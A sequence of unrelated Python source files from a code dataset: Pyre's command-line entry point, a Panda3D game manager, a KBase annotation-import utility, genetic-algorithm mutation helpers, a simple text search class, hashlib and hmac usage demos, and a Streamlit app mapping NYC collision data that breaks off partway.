parsed_commands.add_parser(commands.Deobfuscate.NAME)\n\n deobfuscate.set_defaults(command=commands.Deobfuscate)\n\n analyze = parsed_commands.add_parser(commands.Analyze.NAME)\n analyze.set_defaults(command=commands.Analyze)\n analyze.add_argument(\n \"analysis\", nargs=\"?\", default=\"taint\", help=\"Type of analysis to run: {taint}\"\n )\n analyze.add_argument(\n \"--taint-models-path\",\n action=\"append\",\n default=[],\n type=readable_directory,\n help=\"Location of taint models\",\n )\n analyze.add_argument(\n \"--no-verify\",\n action=\"store_true\",\n help=\"Do not verify models for the taint analysis.\",\n )\n analyze.add_argument(\n \"--save-results-to\",\n default=None,\n type=writable_directory,\n help=\"Directory to write analysis results to.\",\n )\n analyze.add_argument(\"--dump-call-graph\", action=\"store_true\")\n analyze.add_argument(\"--repository-root\", type=os.path.abspath)\n analyze.add_argument(\"--rule\", action=\"append\", type=int)\n\n persistent = parsed_commands.add_parser(\n commands.Persistent.NAME,\n epilog=\"\"\"\n Entry point for IDE integration to Pyre. Communicates with a\n Pyre server using the Language Server Protocol, accepts input from stdin and\n writing diagnostics and responses from the Pyre server to stdout.\n \"\"\",\n )\n persistent.add_argument(\n \"--no-watchman\",\n action=\"store_true\",\n help=\"Do not spawn a watchman client in the background.\",\n )\n persistent.set_defaults(command=commands.Persistent, noninteractive=True)\n\n start = parsed_commands.add_parser(\n commands.Start.NAME, epilog=\"Starts a pyre server as a daemon.\"\n )\n start.add_argument(\n \"--terminal\", action=\"store_true\", help=\"Run the server in the terminal.\"\n )\n start.add_argument(\n \"--store-type-check-resolution\",\n action=\"store_true\",\n help=\"Store extra information for `types` queries.\",\n )\n start.add_argument(\n \"--no-watchman\",\n action=\"store_true\",\n help=\"Do not spawn a watchman client in the background.\",\n )\n start.add_argument(\n \"--incremental-style\",\n type=IncrementalStyle,\n choices=list(IncrementalStyle),\n default=IncrementalStyle.SHALLOW,\n help=\"How to approach doing incremental checks.\",\n )\n start.set_defaults(command=commands.Start)\n\n stop = parsed_commands.add_parser(\n commands.Stop.NAME, epilog=\"Signals the Pyre server to stop.\"\n )\n stop.set_defaults(command=commands.Stop)\n\n restart = parsed_commands.add_parser(\n commands.Restart.NAME,\n epilog=\"Restarts a server. Equivalent to `pyre stop && pyre start`.\",\n )\n restart.add_argument(\n \"--terminal\", action=\"store_true\", help=\"Run the server in the terminal.\"\n )\n restart.add_argument(\n \"--store-type-check-resolution\",\n action=\"store_true\",\n help=\"Store extra information for `types` queries.\",\n )\n restart.add_argument(\n \"--no-watchman\",\n action=\"store_true\",\n help=\"Do not spawn a watchman client in the background.\",\n )\n restart.add_argument(\n \"--incremental-style\",\n type=IncrementalStyle,\n choices=list(IncrementalStyle),\n default=IncrementalStyle.SHALLOW,\n help=\"How to approach doing incremental checks.\",\n )\n restart.set_defaults(command=commands.Restart)\n\n kill = parsed_commands.add_parser(commands.Kill.NAME)\n kill.add_argument(\n \"--with-fire\", action=\"store_true\", help=\"Adds emphasis to the command.\"\n )\n kill.set_defaults(command=commands.Kill)\n\n initialize = parsed_commands.add_parser(commands.Initialize.NAME, aliases=[\"init\"])\n initialize.add_argument(\n \"--local\",\n action=\"store_true\",\n help=\"Initializes a local configuration in a project subdirectory.\",\n )\n initialize.set_defaults(command=commands.Initialize)\n\n query_message = \"\"\"\n `https://pyre-check.org/docs/querying-pyre.html` contains examples and documentation\n for this command, which queries a running pyre server for type, function and\n attribute information.\n\n To get a full list of queries, you can run `pyre query help`.\n \"\"\"\n query = parsed_commands.add_parser(commands.Query.NAME, epilog=query_message)\n query_argument_message = \"\"\"\n `pyre query help` will give a full list of available queries for the running Pyre.\n Example: `pyre query \"superclasses(int)\"`.\n \"\"\"\n query.add_argument(\"query\", help=query_argument_message)\n query.set_defaults(command=commands.Query)\n\n infer = parsed_commands.add_parser(commands.Infer.NAME)\n infer.add_argument(\n \"-p\",\n \"--print-only\",\n action=\"store_true\",\n help=\"Print raw JSON errors to standard output, \"\n + \"without converting to stubs or annnotating.\",\n )\n infer.add_argument(\n \"-f\",\n \"--full-only\",\n action=\"store_true\",\n help=\"Only output fully annotated functions. Requires infer flag.\",\n )\n infer.add_argument(\n \"-r\",\n \"--recursive\",\n action=\"store_true\",\n help=\"Recursively run infer until no new annotations are generated.\"\n + \" Requires infer flag.\",\n )\n infer.add_argument(\n \"-i\",\n \"--in-place\",\n nargs=\"*\",\n metavar=\"path\",\n type=file_exists,\n help=\"Add annotations to functions in selected paths.\"\n + \" Takes a set of files and folders to add annotations to.\"\n + \" If no paths are given, all functions are annotated.\"\n + \" WARNING: Modifies original files and requires infer flag and retype\",\n )\n infer.add_argument(\n \"--json\",\n action=\"store_true\",\n help=\"Accept JSON input instead of running full check.\",\n )\n infer.add_argument(\n \"--annotate-from-existing-stubs\",\n action=\"store_true\",\n help=\"Add annotations from existing stubs.\",\n )\n infer.add_argument(\n \"--debug-infer\",\n action=\"store_true\",\n help=\"Print error message when file fails to annotate.\",\n )\n infer.set_defaults(command=commands.Infer)\n\n statistics = parsed_commands.add_parser(commands.Statistics.NAME)\n statistics.add_argument(\n \"filter_paths\",\n nargs=\"*\",\n type=file_exists,\n help=\"Source path(s) to gather metrics for.\",\n )\n statistics.set_defaults(command=commands.Statistics)\n\n profile = parsed_commands.add_parser(commands.Profile.NAME)\n profile.add_argument(\n \"--output\",\n type=ProfileOutput,\n choices=ProfileOutput,\n help=\"Specify what to output.\",\n default=ProfileOutput.COLD_START_PHASES,\n )\n profile.set_defaults(command=commands.Profile)\n\n arguments = parser.parse_args()\n\n if not hasattr(arguments, \"command\"):\n if shutil.which(\"watchman\"):\n # pyre-fixme[16]: `Namespace` has no attribute `command`.\n arguments.command = commands.Incremental\n # pyre-fixme[16]: `Namespace` has no attribute `nonblocking`.\n arguments.nonblocking = False\n # pyre-fixme[16]: `Namespace` has no attribute `transitive`.\n arguments.incremental_style = IncrementalStyle.SHALLOW\n else:\n watchman_link = \"https://facebook.github.io/watchman/docs/install.html\"\n LOG.warning(\n \"No watchman binary found. \\n\"\n \"To enable pyre incremental, \"\n \"you can install watchman: {}\".format(watchman_link)\n )\n LOG.warning(\"Defaulting to non-incremental check.\")\n arguments.command = commands.Check\n\n configuration = None\n analysis_directory = None\n # Having this as a fails-by-default helps flag unexpected exit\n # from exception flows.\n exit_code = ExitCode.FAILURE\n start = time.time()\n try:\n # pyre-fixme[16]: `Namespace` has no attribute `capable_terminal`.\n arguments.capable_terminal = is_capable_terminal()\n if arguments.debug or not arguments.capable_terminal:\n # pyre-fixme[16]: `Namespace` has no attribute `noninteractive`.\n arguments.noninteractive = True\n\n switch_root(arguments)\n translate_arguments(commands, arguments)\n find_log_directory(arguments)\n log.initialize(arguments)\n\n if arguments.command in [commands.Initialize]:\n analysis_directory = AnalysisDirectory(\".\")\n else:\n if arguments.version:\n binary_version = get_binary_version_from_file(\n arguments.local_configuration\n )\n log.stdout.write(\n \"binary version: {}\\nclient version: {}\".format(\n binary_version, __version__\n )\n )\n return ExitCode.SUCCESS\n configuration = Configuration(\n local_configuration=arguments.local_configuration,\n search_path=arguments.search_path,\n binary=arguments.binary,\n typeshed=arguments.typeshed,\n preserve_pythonpath=arguments.preserve_pythonpath,\n excludes=arguments.exclude,\n logger=arguments.logger,\n formatter=arguments.formatter,\n log_directory=arguments.log_directory,\n )\n if configuration.disabled:\n LOG.log(\n log.SUCCESS, \"Pyre will not run due to being explicitly disabled\"\n )\n return ExitCode.SUCCESS\n\n if arguments.command in [commands.Kill]:\n analysis_directory = AnalysisDirectory(\".\")\n else:\n isolate = (\n arguments.command in [commands.Analyze, commands.Check]\n and not arguments.use_global_shared_analysis_directory\n )\n analysis_directory = resolve_analysis_directory(\n arguments, commands, configuration, isolate=isolate\n )\n\n command = arguments.command\n exit_code = (\n command(arguments, configuration, analysis_directory).run().exit_code()\n )\n except buck.BuckException as error:\n LOG.error(str(error))\n if arguments.command == commands.Persistent:\n commands.Persistent.run_null_server(timeout=3600 * 12)\n exit_code = ExitCode.BUCK_ERROR\n except EnvironmentException as error:\n LOG.error(str(error))\n if arguments.command == commands.Persistent:\n commands.Persistent.run_null_server(timeout=3600 * 12)\n exit_code = ExitCode.FAILURE\n except commands.ClientException as error:\n LOG.error(str(error))\n exit_code = ExitCode.FAILURE\n except Exception as error:\n LOG.error(str(error))\n LOG.info(traceback.format_exc())\n exit_code = ExitCode.FAILURE\n except KeyboardInterrupt:\n LOG.warning(\"Interrupted by user\")\n LOG.debug(traceback.format_exc())\n exit_code = ExitCode.SUCCESS\n finally:\n log.cleanup(arguments)\n if analysis_directory:\n analysis_directory.cleanup()\n if configuration and configuration.logger:\n log_statistics(\n \"perfpipe_pyre_usage\",\n arguments=arguments,\n configuration=configuration,\n integers={\n \"exit_code\": exit_code,\n \"runtime\": int((time.time() - start) * 1000),\n },\n normals={\"cwd\": os.getcwd(), \"client_version\": __version__},\n )\n\n return exit_code\n\n\nif __name__ == \"__main__\":\n try:\n os.getcwd()\n except FileNotFoundError:\n LOG.error(\n \"Pyre could not determine the current working directory. \"\n \"Has it been removed?\\nExiting.\"\n )\n sys.exit(ExitCode.FAILURE)\n sys.exit(main())\n","sub_path":"client/pyre.py","file_name":"pyre.py","file_ext":"py","file_size_in_byte":21965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"9416634","text":"'''\nCreated on Jun 27, 2010\n\n@author: Angus\n'''\nimport CConfig \n\nfrom direct.showbase.ShowBase import ShowBase\nfrom direct.showbase.DirectObject import DirectObject\nimport sys, time\nfrom direct.fsm.FSM import FSM\nfrom pandac.PandaModules import Vec3\nfrom pandac.PandaModules import *\nfrom direct.interval.IntervalGlobal import *\n \nfrom CLevel import CLevel\nfrom CGUI import Picker2D, MouseCursor\nfrom CInput import CInput\nfrom CJointedSprite import CJointedSprite\nfrom CSound import CSound\nfrom CStats import CStats\nfrom CAgent import CAgent\nfrom direct.gui.DirectGui import *\n\nfrom panda3d.core import ClockObject\n \nclass CAppRoot(ShowBase):\n \"\"\"\n An application class that should be setting many of the defaults for creating a 2D Application.\n \"\"\"\n def __init__(self):\n \n \"\"\"\n Initiation function for Application2D class.\n Calls ShowBase init as well.\n \"\"\"\n ShowBase.__init__(self)\n\n #Custom Config settings\n #Exit on Escape Key\n if CConfig.exitOnEscape:\n self.accept(\"escape\", sys.exit)\n #Mouse + Keys Camera Control\n if CConfig.trackballCamControl:\n self.useTrackball()\n else:\n self.disableMouse()\n if CConfig.driveCamControl:\n self.useDrive() \n \n \n #self.accept('i', PStatClient.connect) \n \n base.mouseWatcherNode.setModifierButtons(ModifierButtons())\n base.buttonThrowers[0].node().setModifierButtons(ModifierButtons()) \n \n base.camera.setY(-60)\n base.camera.setZ(20)\n \n self.gameManager = GameManager()\n \nclass GameManager(FSM, DirectObject):\n \n def __init__(self):\n FSM.__init__(self, 'GameManager')\n self.picker2D = Picker2D()\n self.cursor = MouseCursor()\n self.inputSystem = CInput()\n self.sound = CSound()\n self.level = None\n \n self.paused = False\n self.accept('t', self.test)\n self.accept('o', self.request, ['Menu'])\n #self.accept('l', self.request, ['Game', 'WelcomeBack/demo_1'])\n self.accept('l', self.request, ['Game', 'testLevel4/testLevel4'])\n \n \n self.accept('EndpointReached', self.request, ['StatsMenu'])\n \n #self.request('Game', 'WelcomeBack/demo_1')\n self.request('Menu')\n \n def test(self):\n CAgent.Agents[0].reparentTo(render)\n CAgent.Agents[0].setPos(-16.42868,-12.342829)\n CAgent.Agents[0].playAnim('walk', loop=True)\n \n def pauseLevel(self):\n if self.paused == False:\n self.paused = True\n self.request('PauseMenu')\n else:\n self.paused = False\n self.request('Game')\n \n def enterGame(self, levelFile = None):\n if self.level == None:\n self.myFrame = DirectFrame(frameColor=(0, 0, 0, 1), frameSize=(-2, 2, -2, 2))\n self.myFrame.setBin('fixed', 40)\n self.myFrame.setPos(0, 0, 0)\n \n self.title = OnscreenImage(pos = (0.2, 0, 0), scale=(1.3,1,0.7), image='Loading.png')\n self.title.setTransparency(TransparencyAttrib.MAlpha)\n self.title.reparentTo(self.myFrame)\n self.cursor.mouseCursor.node.hide()\n \n for i in range(2):\n base.graphicsEngine.renderFrame()\n time.sleep(0.1)\n self.level = CLevel(levelFile)\n \n self.accept('escape', self.pauseLevel)\n self.myFrame.destroy()\n self.cursor.mouseCursor.node.show()\n #self.sound.FadeOutIn(self.sound.m_StreetTheme)\n def exitGame(self):\n if not self.paused:\n self.ignore('escape')\n self.level.closeLevel()\n del self.level\n self.level = None\n\n def enterPauseMenu(self):\n self.level.pauseLevel()\n self.myFrame = DirectFrame(frameColor=(0, 0, 0, 0.25), frameSize=(-2, 2, -2, 2))\n self.myFrame.setBin('fixed', 40)\n self.myFrame.setPos(0, 0, 0)\n \n self.btnMenuResume = DirectButton(text = \"\", scale=(0.6,0.5,0.5), command=self.pauseLevel, frameColor=(0,0,0,0), image='Resume.png')\n self.btnMenuResume['image_scale'] = (1,1,1)\n self.btnMenuResume.setPos(0, 0, 0.25)\n self.btnMenuResume.reparentTo(self.myFrame)\n self.btnMenuResume.setTransparency(TransparencyAttrib.MAlpha)\n \n self.btnMenuQuit = DirectButton(text = \"\", scale=(0.45,0.5,0.35), command=exit, frameColor=(0,0,0,0), image='Quit.png')\n self.btnMenuQuit.setPos(0, 0, -0.45)\n self.btnMenuQuit['image_scale'] = (1,1,1)\n self.btnMenuQuit.reparentTo(self.myFrame)\n self.btnMenuQuit.setTransparency(TransparencyAttrib.MAlpha)\n \n def exitPauseMenu(self):\n self.myFrame.destroy()\n self.level.resumeLevel() \n \n def enterMenu(self):\n self.sound.FadeOutIn(self.sound.m_MenuTheme)\n self.myFrame = DirectFrame(frameColor=(0, 0, 0, 1), frameSize=(-2, 2, -2, 2))\n self.myFrame.setBin('fixed', 40)\n self.myFrame.setPos(0, 0, 0)\n \n self.btnMenuPlay = DirectButton(text = \"\", scale=(0.45,0.5,0.35), command=self.request, frameColor=(0,0,0,255), image='Play.png', extraArgs=['Game', 'Welcome Back/WelcomeBack'])\n self.btnMenuPlay['image_scale'] = (1.15,1,1.15)\n self.btnMenuPlay.setPos(-0.4, 0, -0.45)\n self.btnMenuPlay.reparentTo(self.myFrame)\n self.btnMenuPlay.setTransparency(TransparencyAttrib.MAlpha)\n \n self.btnMenuQuit = DirectButton(text = \"\", scale=(0.45,0.5,0.35), command=exit, frameColor=(0,0,0,255), image='Quit.png')\n self.btnMenuQuit.setPos(0.4, 0, -0.45)\n self.btnMenuQuit['image_scale'] = (1.15,1,1.15)\n self.btnMenuQuit.reparentTo(self.myFrame)\n self.btnMenuQuit.setTransparency(TransparencyAttrib.MAlpha)\n \n self.title = OnscreenImage(pos = (0, 0, 0.2), scale=(1.3,1,0.7), image='Title.png')\n self.title.setTransparency(TransparencyAttrib.MAlpha)\n \n self.title.reparentTo(self.myFrame)\n pass\n \n def exitMenu(self):\n self.myFrame.destroy()\n #self.sound.FadeOutSound(soundType = 'MenuTheme')\n\n def enterStatsMenu(self):\n self.sound.FadeOutIn(self.sound.m_StatsTheme)\n CStats.showStats()\n self.accept('space', self.request, ['Menu'])\n \n def exitStatsMenu(self):\n self.ignore('space')\n CStats.unshowStats()","sub_path":"src/CAppRoot.py","file_name":"CAppRoot.py","file_ext":"py","file_size_in_byte":6557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"117953156","text":"# import sys\nimport os\nimport datetime\nimport logging\nimport json\nimport uuid\n\nfrom installed_clients.WorkspaceClient import Workspace as Workspace\nfrom installed_clients.KBaseReportClient import KBaseReport\n#from installed_clients.annotation_ontology_apiServiceClient import annotation_ontology_api\nfrom installed_clients.cb_annotation_ontology_apiClient import cb_annotation_ontology_api\n\nimport MergeMetabolicAnnotations.utils.functions as f\n\n\nclass ImportAnnotationsUtil:\n\n def __init__(self, config):\n self.config = config\n self.timestamp = datetime.datetime.now().strftime(\"%Y_%m_%d_%H_%M_%S\")\n self.callback_url = config['SDK_CALLBACK_URL']\n self.scratch = config['scratch']\n self.ws_client = Workspace(config[\"workspace-url\"])\n # self.anno_api = annotation_ontology_api()\n self.anno_api = cb_annotation_ontology_api(self.callback_url) # ,token=self.token\n self.kbr = KBaseReport(self.callback_url)\n\n def run(self, ctx, params):\n\n ontology = f.df_to_ontology(params)\n with open(os.path.join(self.scratch, \"ontology_before_api.json\"), 'w') as outfile:\n json.dump(ontology, outfile, indent=2)\n\n add_ontology_results = self.anno_api.add_annotation_ontology_events({\n \"input_ref\": params['genome'],\n \"output_name\": params['output_name'],\n \"input_workspace\": params['workspace_name'],\n \"workspace-url\": self.config[\"workspace-url\"],\n \"events\": ontology,\n \"timestamp\": self.timestamp,\n \"output_workspace\": params['workspace_name'],\n \"save\": 1\n })\n\n # get the new list of events to make a table\n get_ontology_results = self.anno_api.get_annotation_ontology_events({\n \"input_ref\": add_ontology_results['output_ref'],\n \"workspace-url\": self.config[\"workspace-url\"]\n })\n\n ontology_selected = f.filter_selected_ontologies(\n get_ontology_results, params, workflow=\"unique\")\n with open(os.path.join(self.scratch, \"get_ontology_dump.json\"), 'w') as outfile:\n json.dump(ontology_selected, outfile, indent=2)\n\n # make report\n html_reports = []\n output_directory = os.path.join(self.scratch, str(uuid.uuid4()))\n os.mkdir(output_directory)\n\n html_reports.append(f.html_add_ontology_summary(\n params, ontology, add_ontology_results, output_directory))\n event_summary = f.get_event_lists(ontology_selected)\n html_reports = f.compare_report_stack(html_reports, event_summary, output_directory)\n\n # finalize html reports\n report_params = {\n 'message': '',\n 'html_links': html_reports,\n 'direct_html_link_index': 0,\n 'objects_created': [{'ref': add_ontology_results[\"output_ref\"], 'description': 'Genome with imported annotations'}],\n 'workspace_name': params['workspace_name'],\n 'report_object_name': f'import_annotations_{uuid.uuid4()}'}\n\n report_output = self.kbr.create_extended_report(report_params)\n\n return {'output_genome_ref': add_ontology_results[\"output_ref\"],\n 'report_name': report_output['name'],\n 'report_ref': report_output['ref']}\n","sub_path":"lib/MergeMetabolicAnnotations/utils/ImportAnnotationsUtil.py","file_name":"ImportAnnotationsUtil.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"50949291","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 27 16:19:09 2021\n\n@author: utente\n\"\"\"\n\nfrom random import randint, sample, uniform\nfrom numpy.random import randn\n\n\ndef geometric_mutation(individual, constant_ms, evolution_step):\n \"\"\"Geometric mutation for snake Individual\n\n Args:\n individual (Individual): A GA individual from call_snake libray.py\n\n Returns:\n Indivdual: mutated Individual\n \"\"\"\n #decrement of the constant_ms\n constant_ms = constant_ms / (evolution_step + 1)\n #We iterate over the weights (matrix, array, matrix, array) \n for i, matrix in enumerate(individual):\n \n if len(matrix.shape) > 1: #check if we are handling a matrix\n for i in range(matrix.shape[0]): #we iterate over the matrix\n for j in range(matrix.shape[1]):\n shift = uniform(-constant_ms, constant_ms) #we select the shift in the interval\n matrix[i,j] += shift\n \n else: #otherwise we are handling an array\n for i in range(len(matrix)): #iterate over array\n shift = uniform(-constant_ms, constant_ms)\n matrix[i] += shift \n \n return individual\n \n \n\ndef normal_distribution_mutation(individual):\n \"\"\" Mutation for snake Individual calculating the shift with a standard normal distribution\n\n Args:\n individual (Individual): A GA individual from call_snake libray.py\n\n Returns:\n Indivdual: mutated Individual\n \"\"\"\n #making a copy of the parent\n weights = individual.weights.copy()\n #We iterate over the weights (matrix, array, matrix, array) \n for i,matrix in enumerate(weights):\n \n if i == 0 or i == 2: #check if we are handling a matrix\n for i in range(matrix.shape[0]): #we iterate over the matrix\n for j in range(matrix.shape[1]):\n shift = randn() #we draw the shift from a standard normal distribution\n matrix[i,j] += shift\n \n else: #otherwise we are handling an array\n for i in range(len(matrix)): #iterate over array\n shift = randn()\n matrix[i] += shift\n \n return weights\n \n ","sub_path":"past_versions/Henrique/Trial2_DF/snake_mutation.py","file_name":"snake_mutation.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"162201129","text":"from db.database_handlers import *\n\nclass SearchEngine:\n def __init__(self):\n self.video_counts = []\n self.part_counts = []\n\n def search_in_text(self, wanted, text):\n wanted_keywords = wanted.split(' ')\n splited_text = text.split(' ')\n count = 0\n for t in splited_text:\n for wk in wanted_keywords:\n if not (wk == 'of' or wk == 'and' or wk == 'but' or wk == 'or' or wk == 'nor' or wk == 'so' or wk == 'for' or wk == 'yet'):\n if(wk == t):\n count += 1\n return count\n\n def search_in_keywords(self, wanted, keyword_list):\n wanted_keywords = wanted.split(' ')\n count = 0\n for keyword in keyword_list:\n for wk in wanted_keywords:\n if not (wk == 'of' or wk == 'and' or wk == 'but' or wk == 'or' or wk == 'nor' or wk == 'so' or wk == 'for' or wk == 'yet'):\n if(wk == keyword):\n count += 1\n return count\n\n def select_video_most_related(self, wanted):\n self.calculate_video_counts(wanted)\n self.video_counts = sorted(self.video_counts, key=lambda x: x[1], reverse=True)\n\n def select_part_most_related(self, wanted):\n self.calculate_part_counts(wanted)\n self.part_counts = sorted(self.part_counts, key=lambda x: x[2], reverse=True)\n\n def parts_of_video(self, video_id, parts):\n parts_of_curr_video = []\n for part in parts:\n if part['video_id'] == video_id:\n parts_of_curr_video.append(part)\n return parts_of_curr_video\n\n def calculate_video_counts(self, wanted):\n parts = db.select_all_from_table_dic('parts')\n videos = db.select_all_from_table_dic('video')\n video_ids = []\n for video in videos:\n video_ids.append(video['video_id'])\n videoCounts = []\n video_count = 0\n curr_video_index = 0\n parts_of_curr_video = []\n for video in video_ids:\n parts_of_curr_video = self.parts_of_video(str(video), parts)\n for part in parts_of_curr_video:\n video_count += self.search_in_text(wanted, part['text'])\n videoCounts.append([video, video_count])\n video_count = 0\n self.video_counts = videoCounts\n return videoCounts\n\n def calculate_part_counts(self, wanted):\n parts = db.select_all_from_table_dic('parts')\n videos = db.select_all_from_table_dic('video')\n partCounts = []\n for part in parts:\n partCounts.append([part['video_id'], part['part_id'], self.search_in_text(wanted, part['text'])])\n self.part_counts = partCounts\n return partCounts\n","sub_path":"flask_module/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"118672153","text":"import hashlib\nfrom hashlib import shake_128\nfrom hashlib import blake2b\n\nimport hmac\n\n# https://docs.python.org/3.7/library/hashlib.html#module-hashlib\n\ndef test_hash_basic():\n\n print('hashlib.algorithms_guaranteed : ', hashlib.algorithms_guaranteed)\n\n print('hashlib.algorithms_available : ', hashlib.algorithms_available)\n\n m = hashlib.sha256()\n\n # Update, the hash object with the bytes-like object. \n # Repeated calls are equivalent to a single call with the concatenation of all the arguments: m.update(a); \n # m.update(b) is equivalent to m.update(a+b).\n m.update(b\"Nobody inspects\")\n m.update(b' the spammish repetition')\n\n # digest, Return the digest of the data passed to the update() method so far. \n # This is a bytes object of size digest_size which may contain bytes in the whole range from 0 to 255.\n c = m.digest()\n print('digest : ', c)\n\n print('hash name : ', m.name)\n print('digest size : ', m.digest_size)\n print('block size : ', m.block_size)\n\n # Return a copy (“clone”) of the hash object. This can be used to efficiently compute the digests of data sharing a common initial substring.\n new_hash_obj = m.copy()\n\n print('sha224 hash : ', hashlib.sha224(b\"Noboday inspects the spammish repetition\").hexdigest())\n\n\n # hashlib.new(name[, data])\n # Is a generic constructor that takes the string name of the desired algorithm as its first parameter. \n # It also exists to allow access to the above listed hashes as well as any other algorithms that your OpenSSL library may offer. \n # The named constructors are much faster than new() and should be preferred.\n h = hashlib.new('ripemd160')\n h.update(b'Nobody inspects the spammish repetition')\n print('ripemd160 hash : ', h.hexdigest())\n\n\ndef test_hash_shake_basic():\n\n # The shake_128() and shake_256() algorithms provide variable length digests with length_in_bits//2 up to 128 or 256 bits of security. \n # As such, their digest methods require a length. Maximum length is not limited by the SHAKE algorithm.\n shake_128.digest(156)\n\ndef test_hash_blake():\n h = blake2b()\n h.update(b'Hello world')\n print('hex digest : ', h.hexdigest())\n\n print(\"blake2 hex digest : \", blake2b(b'Hello world').hexdigest())\n\n h1 = blake2b(key='key-to-encrypt')\n items = [b'Hello', b' ', b'World']\n for item in items:\n h1.update(item)\n print('blake2 update hex digest : ', h1.hexdigest())\n\n h2 = blake2b(digest_size=20)\n h2.update(b'Hello world')\n print(\"blake2 size20 digest: \", h2.hexdigest())\n print(\"digest size \", h2.digest_size)\n print(\"length of digest \", len(h2.digest()))\n\n\ndef test_keyed_hash():\n # Keyed hashing\n # Keyed hashing can be used for authentication as a faster and simpler replacement for Hash-based message authentication code (HMAC). \n # BLAKE2 can be securely used in prefix-MAC mode thanks to the indifferentiability property inherited from BLAKE.\n h = blake2b(key=b'pseudorandom key', digest_size=16)\n h.update(b'message data')\n print('keyed hash code : ', h.hexdigest())\n\n # Even though there’s a native keyed hashing mode, BLAKE2 can, of course, be used in HMAC construction with hmac module:\n m = hmac.new(b'secret key', digestmod=hashlib.blake2s)\n m.update(b'message to send')\n print('keyed message ', m.hexdigest())\n\n\ndef test_hash_tree_mode():\n FANOUT = 2\n DEPTH = 2\n LEAF_SIZE = 4096\n INNER_SIZE = 64\n\n buf = bytearray(6000)\n\n h00 = blake2b(buf[0:LEAF_SIZE], fanout=FANOUT, depth=DEPTH,\n leaf_size = LEAF_SIZE, inner_size=INNER_SIZE,\n node_offset=0, node_depth=0, last_node=False)\n \n h01 = blake2b(buf[LEAF_SIZE:], fanout=FANOUT, depth=DEPTH,\n leaf_size=LEAF_SIZE, inner_size=INNER_SIZE,\n node_offset=1, node_depth=0, last_node=True)\n\n h10 = blake2b(digest_size=32, fanout=FANOUT, depth=DEPTH,\n leaf_size=LEAF_SIZE, inner_size=INNER_SIZE,\n node_offset=0, node_depth=1, last_node=True)\n \n h10.update(h00.digest())\n h10.update(h01.digest())\n c = h10.hexdigest()\n print('tree mode digest : ', c)\n\n\nif __name__ == '__main__':\n\n test_hash_basic()\n\n test_hash_shake_basic()\n\n test_keyed_hash()","sub_path":"Python35/App/HandleJWT/test_hashlib.py","file_name":"test_hashlib.py","file_ext":"py","file_size_in_byte":4253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"12433378","text":"\n\"\"\"\nName: CASEY HEALEY\nCS602: Section 1\nData: NYC Collison Data\nURL: Link to your web application online (see extra credit)\nDescription:\nThe program is broken into two parts - \"MAP\" and \"BREAKDOWN\"\n\n\"MAP\"\nThis program takes NYC Collison data and creates a map that can be filtered by date.\nThe program also outputs the average number of deaths and injuries per accident in the specified timeframe\nand outputs a chart with the injuries and death breakdown for each borough, sorted by injuries\n\n\"BREAKDOWN\"\nThe program's second page uses matplotlib and seaborn to create two visualizations - users select a factor,\nborough and \"injured or killed\" and the output is a pie chart of 3 injured or killed groups\n(pedestrians, motorist and cyclists)\n\nAt the bottom, using seaborn, the program uses the same filtered data to generate\na boxplot of the vehicle type & persons injured/killed\n\nWhere I believe I meet the project requirements is also commented out\n\n\"\"\"\nimport numpy as np\nimport streamlit as st\nimport pandas as pd\nimport datetime\nfrom matplotlib import pyplot as plt\n#package not used during the semester\nimport seaborn as sns\nimport random\n\n\n@st.cache\ndef loaddata():\n df = pd.read_csv('database.csv')\n # The dataset contains a few values that are outside the range of NYC\n # The code below deletes the rows with errors\n df = df[df['LATITUDE'].values > 39]\n df = df[(df['LONGITUDE'].values > -75) & (df['LONGITUDE'].values < -72)]\n df['DATE'] = pd.to_datetime(df['DATE'])\n df = df[df['LATITUDE'].notna()]\n df = df[df['LONGITUDE'].notna()]\n df = df[df['BOROUGH'].notna()]\n # creates a dataframe with Date, Latitude and Longitude\n # drops null values for mapping\n return df\n\ndf = loaddata()\n\ndef accidents_map(df):\n #ZIPS 3 relevant columns into a dataframe\n locations = tuple(zip(df['DATE'], df['LATITUDE'], df['LONGITUDE']))\n location = pd.DataFrame(locations, columns=[\"Date\", \"lat\", \"lon\"])\n st.title(\"Accidents in 5 Boroughs\")\n min_date = min(location['Date'].dt.date)\n max_date = max(location['Date'].dt.date)\n #UI Control #1\n start_date = st.sidebar.date_input('Start date', datetime.date(2015,1,1), min_value = min_date, max_value = max_date)\n end_date = st.sidebar.date_input('End date', datetime.date(2017,1,1), min_value = min_date, max_value=max_date)\n if start_date > end_date:\n st.error('Error: End date must fall after start date.')\n #filters data based on start and end date chosen by user\n #Pandas Features #1 - Sorting\n filtered_data = location[(location['Date'].dt.date >= start_date) & (location['Date'].dt.date <= end_date)]\n #filtered_df gives a filtered version of the larger database, for the summary on the left column\n filtered_df = df[(df['DATE'].dt.date >= start_date) & (df['DATE'].dt.date <= end_date)]\n # Pandas Features #2, Groupby\n summary = filtered_df.groupby([\"BOROUGH\"])[[\"PERSONS INJURED\", \"PERSONS KILLED\"]].sum().sort_values(('PERSONS KILLED'), ascending=True)\n st.sidebar.text(f'Average number of injuries per accident \\n for the time period selected: {round(filtered_df[\"PERSONS INJURED\"].mean(),3)}')\n st.sidebar.text(f'Average number of deaths per accident \\n for the time period selected: {round(filtered_df[\"PERSONS KILLED\"].mean(),3)}')\n st.sidebar.text(f\"Number of People Injured or Killed \\n From {start_date} to {end_date}.\")\n st.sidebar.dataframe(summary)\n st.subheader(f'Map of all accidents from {start_date} to {end_date}')\n st.map(filtered_data)\n\n\nfactors = []\nboroughs = []\n#Interacting with Lists or List Comprehensions\nfor i in df[\"VEHICLE 1 FACTOR\"]:\n if i not in factors:\n factors.append(i)\nfor j in df[\"BOROUGH\"]:\n if j not in boroughs:\n boroughs.append(j)\n\n#At least one function with a default parameter called more than once 